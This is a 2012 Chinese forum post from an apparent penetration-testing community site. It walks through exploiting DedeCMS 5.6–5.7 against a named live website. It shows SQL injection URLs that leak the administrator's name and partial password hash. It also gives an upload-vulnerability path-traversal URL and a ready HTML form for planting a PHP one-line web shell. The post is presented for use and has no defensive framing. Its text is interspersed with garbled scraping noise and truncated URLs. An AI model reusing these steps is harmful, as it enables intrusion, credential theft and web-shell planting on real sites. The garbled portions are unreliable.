中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]

---

作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
4 u! `1 f; A: N- S这站 http://www.political-security.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，
  R+ B, q' x* f* Z! u- Zwww.political-security.com/data/mysql_error_trace.inc 爆后台
: ]( z1 p2 V8 D$ H然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
6 W  ?8 O0 I- r然后写上语句
查看管理员帐号
. T2 a: ]+ f1 Q& }) B. phttp://www.political-security.co ... &membergroup=@`

admin
% p* `5 A- o; V; N! I% _, q0 p
: C/ c3 ?- u5 x4 H3 D) z查看管理员密码
　http://www.political-security.co ... &membergroup=@`
' V" Z3 T; T" z3 p8 i
8d29b1ef9f8c5a5af429
  E5 l$ H3 a& v! u0 |9 r& m4 Z; C
查看管理员密码

得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5

8d2
9b1ef9f8c5a5af42
, N" v* J% Z% _' T9 x9 j9

cmd5没解出来 只好测试第二个方法
, i9 G# Y/ W9 u$ H. q6 r9 ?$ \
2 t% q, M5 m. V; q# J* o3 t2 Q- |% \
②上传漏洞：

* _: X. j1 J8 Z只要登陆会员中心，然后访问页面链接
5 K1 `% ]) q: l“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
% w. V: `" R2 G, v/ ]) a7 \$ L
5 u; i/ H/ c& M8 u1 Z# i* {+ [2 l如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
( i; [# r5 e  z# D  D$ B
于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm
) }) Q, j# P$ ^4 k! P
, Z) A: D6 P0 B, {$ T* J5 V; ]<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
* Q2 P5 Q  z  G8 g  |  @# e6 D  ?: [或者
即可上传成功

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2